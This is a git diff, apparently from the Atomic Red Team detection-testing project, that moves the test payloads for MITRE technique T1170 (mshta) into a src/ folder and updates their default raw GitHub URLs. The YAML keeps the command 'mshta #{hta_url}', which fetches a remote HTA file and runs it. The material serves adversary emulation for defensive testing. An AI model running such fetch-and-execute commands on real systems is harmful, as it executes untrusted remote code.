diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml index 5553b760..964679e8 100644 --- a/atomics/T1170/T1170.yaml +++ b/atomics/T1170/T1170.yaml @@ -12,7 +12,7 @@ atomic_tests: file_url: description: location of the payload type: Url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/mshta.sct executor: name: command_prompt elevation_required: false @@ -58,8 +58,8 @@ atomic_tests: hta_url: description: URL to HTA file for execution type: string - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/T1170.hta executor: name: command_prompt command: | - mshta #{hta_url} \ No newline at end of file + mshta #{hta_url} diff --git a/atomics/T1170/T1170.hta b/atomics/T1170/src/T1170.hta similarity index 96% rename from atomics/T1170/T1170.hta rename to atomics/T1170/src/T1170.hta index 59101b61..b9df6d91 100644 --- a/atomics/T1170/T1170.hta +++ b/atomics/T1170/src/T1170.hta @@ -9,4 +9,4 @@ - \ No newline at end of file + diff --git a/atomics/T1170/mshta.sct b/atomics/T1170/src/mshta.sct similarity index 100% rename from atomics/T1170/mshta.sct rename to atomics/T1170/src/mshta.sct